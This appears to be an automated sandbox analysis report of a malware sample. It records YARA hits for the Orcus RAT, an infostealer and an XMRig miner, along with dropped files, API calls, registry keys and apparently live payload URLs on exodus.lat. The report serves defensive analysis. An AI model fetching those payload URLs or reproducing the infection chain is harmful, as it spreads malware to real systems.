                                  Source: Yara match, File source: 00000035.00000002.4579522041.000001F79B4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 0000002F.00000002.4579567004.000001EE7636F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 0000002F.00000002.4566859084.000001EE65D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000037.00000002.4582934656.000002749FD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPED
                                  Source: DM6vAAgoCw.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: DM6vAAgoCw.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Source: Binary string: q$costura.orcus.staticcommands.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: costura.shelllibrary.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdb source: RegAsm.exe, 00000016.00000002.4642907007.00000000061D0000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared\obj\Release\Orcus.Shared.pdb@q source: RegAsm.exe, 00000016.00000002.4626770103.0000000005130000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdbL source: RegAsm.exe, 00000016.00000002.4642907007.00000000061D0000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed source: smartscreen.exe, 00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000016.00000000.3684956628.00000000003E2000.00000002.00000001.01000000.0000000A.sdmp
                                  Source: Binary string: costura.directoryinfoex.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Tools\CLIPPER\obj\Release\net461\win-x64\CLIPPER.pdbSHA256 source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb source: RegAsm.exe, 00000016.00000002.4570721077.0000000002A50000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: q&costura.orcus.shared.utilities.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000016.00000000.3684956628.00000000003E2000.00000002.00000001.01000000.0000000A.sdmp
                                  Source: Binary string: costura.orcus.shared.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdb source: RegAsm.exe, 00000016.00000002.4641407014.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: C:\Users\zack3r\Desktop\Orcus.Plugins.ADE\Orcus.Plugins.BsodProtection-master\Source\obj\Debug\BsodProtection.pdb source: RegAsm.exe, 00000016.00000002.4641342536.0000000005A80000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.opuswrapper.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdbH0 source: RegAsm.exe, 00000016.00000002.4641407014.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Tools\CLIPPER\obj\Release\net461\win-x64\CLIPPER.pdb source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: q'costura.fluentcommandlineparser.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared.Utilities\obj\Release\Orcus.Shared.Utilities.pdb source: RegAsm.exe, 00000016.00000002.4640471488.0000000005A40000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared\obj\Release\Orcus.Shared.pdb source: RegAsm.exe, 00000016.00000002.4626770103.0000000005130000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: C:\Users\zack3r\Desktop\Orcus.Plugins.ADE\Orcus.Plugins.BsodProtection-master\Source\obj\Debug\BsodProtection.pdb8*R* D*_CorDllMainmscoree.dll source: RegAsm.exe, 00000016.00000002.4641342536.0000000005A80000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.orcus.plugins.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_00694005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00694005
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_0069C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0069C2FF
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_0069494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0069494A
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_0069CD14 FindFirstFileW,FindClose,18_2_0069CD14
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_0069CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0069CD9F
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_0069F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0069F5D8
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_0069F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0069F735
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_0069FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0069FA36
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_00693CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00693CE2
                                  Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\491505\
                                  Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\
                                  Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
                                  Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
                                  Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\491505
                                  Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
                                  Source: Joe Sandbox View, IP Address: 172.67.74.152
                                  Source: Joe Sandbox View, ASN Name: M247GB
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr, Code function: 18_2_006A29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,18_2_006A29BA
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                                  Source: RegAsm.exe, 00000016.00000002.4635504009.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                  Source: DM6vAAgoCw.exe, 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp, DM6vAAgoCw.exe, 00000000.00000000.2111219967.0000000000409000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ocsp2.globalsign.com/rootr306
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, Dr.com, 0000000A.00000000.2139917691.0000000000DC9000.00000002.00000001.01000000.00000007.sdmp, ApolloPro.scr, 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.000000000300E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://exodus.lat/COMSurrogat
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://exodus.lat/COMSurrogate.exe
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://exodus.lat/ss.bat
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.autoitscript.com/autoit3/
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.globalsign.com/repository/06
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,18_2_006A4830
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006A4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,18_2_006A4632
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeWindow created: window name: CLIPBRDWNDCLASS
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeWindow created: window name: CLIPBRDWNDCLASS
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeWindow created: window name: CLIPBRDWNDCLASS
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,18_2_006BD164

                                  Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                                  Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process information set: 01 00 00 00

                                  System Summary

Source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: Process Memory Space: RegAsm.exe PID: 6884, type: MEMORYSTR | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPED | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPED | Matched rule: Detects coinmining malware Author: ditekSHen
Source: Yara match | File source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6884, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js"
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00694254 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00688F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00695778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | File created: C:\Users\user\AppData\Local\asm\WinRing0x64.sys
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | File created: C:\Windows\MovieArchives
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | File created: C:\Windows\PackageExpression
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: 0_2_0040737E
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: 0_2_00406EFE
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: 0_2_004079A2
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: 0_2_004049A8
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0063B020
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006394E0
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00639C80
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006523F5
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006B8400
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00666502
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0066265E
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0063E6F0
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0065282A
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006689BF
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00666A74
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006B0A3A
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00640BE0
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0065CD51
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0068EDB2
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00698E44
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006B0EB7
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00666FE6
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006533B7
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0064D45D
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0065F409
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00631663
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0064F628
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0063F6A0
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006516B4
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006578C3
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0065DBA5
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00651BA8
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00669CE5
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0064DD28
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00651FC0
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0065BFD6
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_00E6A032
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_00E68ED0
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06DBD350
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06DBB308
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06DB9160
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06DBCF10
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06DB8638
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06DBD788
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06FEB658
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06FEBF28
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06FE3880
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06FEB310
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Code function: 47_2_00007FFD34890F35
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Code function: 53_2_00007FFD348B0F35
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\491505\Dr.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: String function: 00641A36 appears 34 times
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: String function: 00658B30 appears 42 times
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: String function: 00650D17 appears 70 times
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: String function: 004062CF appears 57 times
Source: DM6vAAgoCw.exe | Static PE information: invalid certificate
Source: COMSurrogate.exe.38.dr | Static PE information: No import functions for PE file found
Source: smartscreen.exe.22.dr | Static PE information: No import functions for PE file found
Source: DM6vAAgoCw.exe, 00000000.00000002.2119003912.0000000000731000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs DM6vAAgoCw.exe
Source: DM6vAAgoCw.exe, 00000000.00000003.2118656988.0000000000731000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs DM6vAAgoCw.exe
